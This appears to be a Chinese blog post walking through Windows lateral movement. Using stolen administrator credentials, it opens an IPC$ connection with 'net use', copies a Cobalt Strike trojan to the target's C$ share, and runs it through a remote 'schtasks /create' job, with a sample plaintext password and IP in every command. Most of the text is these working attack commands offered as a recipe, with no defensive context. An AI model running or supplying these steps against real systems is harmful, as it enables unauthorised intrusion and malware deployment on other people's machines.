window横向渗透-IPC命令&schtasks 计划任务上线

0x01 条件

1、我们获取到目标主机管理员账号密码,并且目标主机的 139,445端口是开启的,

在这里插入图片描述

0x02 建立ipc协议拷贝cs木马

这时候, 我们可以先建立ips 协议,
net use \ip\ipc$ 密码 /user:账号
例子
net use \\192.168.93.10\ipc$ zxcASDqw123!! /user:administrator

并使用 net use 查看 ipc 连接

在这里插入图片描述

盘符映射

并把目标的c盘挂载到 我们的E 盘上
net use z: \ip\c$ “密码” /user:”Administrator”把目标C盘映射到本地z盘
这时候我们电脑上就会多了一个盘
在这里插入图片描述
删除 映射的盘命令
net use z: /del
这时候,我们就能把cs 文件拷贝进去

copy命令

或者使用 copy 命令直接上传
copy 要上传的文件 \IP\C$
例子
copy test.jsp \192.168.93.10\c$

在这里插入图片描述
目标服务器c盘上

在这里插入图片描述

0x03 schtasks 开启计划任务

1、查看 目标主机时间
net time \\192.168.93.10
在这里插入图片描述

2、创建计划任务 (测试的时候有点卡,要等一会)
schtasks /create /s 192.168.93.10 /u administrator /p zxcASDqw123!! /tn c /tr c:/abcd.exe /sc once /st 17:48 /sd 2022/01/10
参数讲解:
/st 参数是时间这里要比目标的主机上晚几分钟。
/sd 如果不设置的情况下,会是默认你的主机时间,但有时候是不对的,所以要自己设置。
在这里插入图片描述
3、查看计划任务
schtasks /query /s 192.168.93.10 /u administrator /p zxcASDqw123!! /TN c

在这里插入图片描述
CS木马上线成功。
在这里插入图片描述

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值